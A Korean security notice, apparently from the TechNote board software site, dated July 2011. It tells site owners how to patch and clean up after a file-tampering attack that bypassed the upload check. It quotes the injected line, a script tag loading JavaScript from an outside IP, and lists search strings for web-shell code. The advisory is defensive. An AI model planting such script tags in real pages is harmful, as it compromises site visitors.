메인 공지사항 기능소개 매뉴얼     TEST BOARD : [1]  [2]  [3]  [4]  [5]
내용없음9
내용없음10
      Main Intro
메인

공지사항

기능소개

매뉴얼

  TEST BOARD
    [1] [2] [3] [4] [5]
최근 30일 POINT RANK
결제충전및 스킨매매 포인트 제외
기즈모SOFT
신홍
TECHSTAR
작은소망
5
소망의힘
6
늑대소냐
7
콜라~
8
아이케
9
아이런
10
스카라베
11
영남뉴스
12
밤안개비
13
BuriBuri
14
그의친구
15
카우스
16
청주산의
17
믿음소망사랑
18
신태원
19
화랑
20
superman
21
네모
22
캥가루
23
물안개너머
24
민민민
25
상옥이
26
미미
27
진호네
28
연숙이
29
bluewolf
30
별미일체
파일변조 해킹 패치하십시오
 technote notice
테크노트 공지사항
ㆍ작성일: 2011/07/06 (수)
파일변조 해킹 패치하십시오
 
------------------------------------------------------------------------
본 공지는 2011 년 7월 6 일 이전에 다운 받은 테크노트7, 테크노트6 버전에만 해당됩니다.
------------------------------------------------------------------------

 

[개요]
2011/07/05 오전 4시 ~ 6시 경 여러 웹호스팅 계정에서 테크노트 파일변조 해킹 발생.

원격 실행지는 중국으로 추정.
 

[증상]
테크노트 기반의 홈페이지,쇼핑몰 전면 혹은 부분적 출력 오류 및 페이지 출력 지연.

 

[변조내용]
테크노트 내의 .php 나 .html 확장자를 가진 불특정 파일 마지막줄에
<script src=http://222.97.189.123/auctionsid/js/set.js></script>  코드가 삽입됨.

혹은 이와 유사한 코드가 삽입됨.
 

[해킹경로]
테크노트 게시판 에티터의  파일첨부 삽입 취약점을 이용,

업로드 파일 확장자 체크 과정을 우회하는 방법으로 해킹파일을 업로드함.
 
 
--------------------------------------------------------------

[패치방법]
 
 
1, 파일교체
    technote/include/board/editsub/file_controll.php
    technote/include/board/editsub/file_controll2.php

    이 두개의 파일을 교체 하십시오.(FTP 파일전송모드는 필히 Binary 로 할것)
    EUC-KR :   file_controll_php_euckr.zip         
    UTF-8    :    file_controll_php_utf8.zip     
 

2, 파일삭제
technote/data/board/게시판명/its_temp_tnt_dir/
디렉토리 내에 어떤 파일이 있으면 다 삭제하십시오.
게시판 별로 폴더가 있을 것이니 모두 확인하십시오.
해킹코드가 들어 있는 파일일 수 있습니다.
 

 
3, 변조여부 확인 및 수정
FTP 접속해서 파일변경 날짜를 확인하면 쉽게 찾을 수 있습니다.
변조가 의심되는 파일은 다운 받아서 편집기로 열어 소스를 확인하십시오.
변조된 파일은 소스 끝 부분에
<script src=http://222.97.189.123/auctionsid/js/set.js></script>
유사 코드가 삽입되어 있으니 이 코드를 제거후 다시 제 위치에 올리십시오.

우선적으로 확인할 파일
   technote/lib.php
   technote/*.php
   technote/include/board/*.php
   technote/include/admin/root/*.php
   technote/contact/*.php

 

 
 
주의
FTP 프로그램에서 php 파일 올릴때 파일전송모드를 반드시 Binary 로 지정하고 올리십시오.
Ascii 모드나 Auto 모드로 올리면 파일이 손상됩니다.

 



파일검색기 활용
  * 다운로드 :
http://www.technote.co.kr/php/technote1/board.php?board=patch&command=body&no=31 
  * 변조파일 검색어
        1.  $_POST[cmd]
        2.  gmfun
        3.  set.js
        4.  top.js
        5.  </script>   (검색어 위치를 '끝부분' 으로 지정하고 검색)
   * 기타 : 검색어 입력없이 파일수정 시간만으로 최근 수정파일 탐색
   * 기타 : 테크노트 폴더 외의 것도 감염되었을 수 있으니 홈페이지 전체적으로 검색